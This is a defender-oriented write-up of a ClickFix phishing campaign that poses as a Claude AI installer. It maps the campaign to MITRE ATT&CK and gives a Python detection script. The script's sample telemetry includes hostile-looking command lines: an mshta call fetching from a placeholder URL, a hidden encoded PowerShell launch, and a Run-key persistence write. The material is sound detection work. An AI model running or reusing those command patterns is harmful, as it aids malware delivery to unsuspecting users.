Context:
The ClickFix phishing campaign leverages social engineering by impersonating a legitimate Claude AI installer to trick users into executing malicious commands. Instead of relying on traditional malware delivery, the attack uses user-assisted execution, instructing victims to run commands via the Windows Run utility, often invoking mshta with a crafted URL. This leads to the download of a malicious MSIX bundle containing an HTA file, which builds an obfuscated PowerShell stage, bypasses AMSI, and retrieves additional payloads from attacker-controlled infrastructure. The final stage includes execution techniques such as process injection using encrypted shellcode.
By combining trusted branding with the ClickFix technique, the campaign increases the likelihood of successful compromise while evading conventional security controls.
MITRE ATT&CK Mapping
| Tactic | Technique ID | Technique Name | Context |
|---|---|---|---|
| Initial Access | T1566.002 | Phishing: Spearphishing Link | Victim clicks a malicious link leading to a phishing page impersonating a Claude AI installer. |
| Execution | T1218.005 | System Binary Proxy Execution: Mshta | Mshta is launched with a crafted URL to retrieve and execute a remote MSIX payload. |
| Command and Control | T1105 | Ingress Tool Transfer | A malicious MSIX bundle is downloaded from attacker-controlled infrastructure. |
| Execution | T1218 | System Binary Proxy Execution | The MSIX package executes an embedded HTA file using trusted Windows components. |
| Defense Evasion | T1027.010 | Obfuscated/Compressed Files: Command Obfuscation | The HTA script contains obfuscated commands designed to evade detection. |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | The HTA script decodes and reconstructs the obfuscated malicious content at runtime. |
| Persistence | T1547.001 | Registry Run Keys / Startup Folder | A registry Run key is created to establish persistence on the system. |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | The HTA script generates and executes an encoded PowerShell command. |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell computes a host-based identifier and retrieves the next-stage payload. |
| Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools | AMSI protections are bypassed to allow execution of malicious PowerShell code. |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | The final PowerShell stage decodes payload data and prepares it for execution. |
| Execution | T1055 | Process Injection | The final payload is injected into a legitimate process using native Windows APIs. |
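The following is an added defender-side example, not code from the page or from the cited reports: it runs detection logic for the mshta -> PowerShell -> Run key portion of the chain mapped above over constructed Sysmon-like events (process-creation and registry-set records). All pids, paths, the URL and the encoded argument are made-up sample data.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape (id 1 = process create, id 13 = registry set).
# Pids, paths, the URL (.invalid TLD) and the -enc argument are made up for this example.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4120, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"id": 1, "pid": 5312, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://installer.example.invalid/claude"},
    {"id": 1, "pid": 5400, "ppid": 5312,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc QUJD"},
    {"id": 13, "pid": 5400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    # Benign control: mshta opening a local .hta shipped with an application, no URL involved.
    {"id": 1, "pid": 6000, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
]

URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)

def is_image(evt, name):
    return evt["image"].lower().endswith("\\" + name)

def remote_mshta(evt):
    """T1218.005: mshta.exe handed a remote URL instead of a local .hta file."""
    return evt["id"] == 1 and is_image(evt, "mshta.exe") and bool(URL_RE.search(evt["cmd"]))

def descendants(events, root_pid):
    """Collect pids spawned (transitively) by root_pid from process-creation events."""
    pids, grew = {root_pid}, True
    while grew:
        new = {e["pid"] for e in events if e["id"] == 1 and e.get("ppid") in pids} - pids
        pids |= new
        grew = bool(new)
    return pids

def detect_clickfix_chain(events):
    """Return (technique, pid) findings: remote mshta, PowerShell beneath it, Run key writes beneath it."""
    findings = []
    for root in (e for e in events if remote_mshta(e)):
        findings.append(("T1218.005 mshta remote URL", root["pid"]))
        tree = descendants(events, root["pid"])
        for e in events:
            if e["id"] == 1 and e["pid"] in tree and is_image(e, "powershell.exe"):
                findings.append(("T1059.001 PowerShell under mshta", e["pid"]))
            if e["id"] == 13 and e["pid"] in tree and RUN_KEY_RE.search(e["target"]):
                findings.append(("T1547.001 Run key write", e["pid"]))
    return findings

if __name__ == "__main__":
    for hit in detect_clickfix_chain(SAMPLE_EVENTS):
        print(hit)
```

The benign local-.hta launch is deliberately not flagged, so the rule keys on the remote-URL argument and the resulting process tree rather than on mshta.exe alone.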
References
https://www.rapid7.com/blog/post/ve-clickfix-phishing-campaign-fake-claude-installer/
https://socprime.com/active-threats/clickfix-phishing-campaign-disguised-as-a-claude-installer/